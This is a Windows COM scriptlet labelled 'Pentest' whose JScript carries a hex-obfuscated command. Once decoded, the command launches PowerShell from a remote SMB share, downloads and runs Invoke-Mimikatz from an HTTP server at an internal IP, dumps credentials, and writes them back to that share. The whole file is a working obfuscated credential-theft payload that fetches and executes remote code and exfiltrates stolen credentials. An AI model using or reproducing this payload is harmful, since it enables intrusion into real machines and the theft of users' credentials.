<?XML version="1.0"?>
<scriptlet>
<registration
progid="Pentest"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var _0xb453=["\x63\x6d\x64\x20\x2f\x6b\x20\x63\x64\x20\x43\x3a\x5c\x20\x26\x20\x5c\x5c\x31\x37\x32\x2e\x31\x36\x2e\x31\x32\x36\x2e\x31\x33\x32\x5c\x47\x75\x65\x73\x74\x5c\x70\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x2e\x65\x78\x65\x20\x22\x49\x45\x58\x20\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x53\x74\x72\x69\x6e\x67\x28\x27\x68\x74\x74\x70\x3a\x2f\x2f\x31\x37\x32\x2e\x31\x36\x2e\x31\x32\x36\x2e\x31\x33\x32\x3a\x38\x30\x30\x30\x2f\x49\x6e\x76\x6f\x6b\x65\x2d\x4d\x69\x6d\x69\x6b\x61\x74\x7a\x2e\x70\x73\x31\x27\x29\x3b\x20\x49\x6e\x76\x6f\x6b\x65\x2d\x4d\x69\x6d\x69\x6b\x61\x74\x7a\x20\x2d\x44\x75\x6d\x70\x43\x72\x65\x64\x73\x20\x7c\x20\x4f\x75\x74\x2d\x46\x69\x6c\x65\x20\x5c\x5c\x31\x37\x32\x2e\x31\x36\x2e\x31\x32\x36\x2e\x31\x33\x32\x5c\x67\x75\x65\x73\x74\x5c\x31\x37\x32\x2e\x31\x36\x2e\x31\x32\x36\x2e\x32\x32\x38\x5f\x6d\x69\x6d\x69\x6b\x61\x74\x7a\x2e\x74\x78\x74\x22","\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C"];var r= new ActiveXObject(_0xb453[1]).Run(_0xb453[0])]]>
</script>
</registration>
</scriptlet>
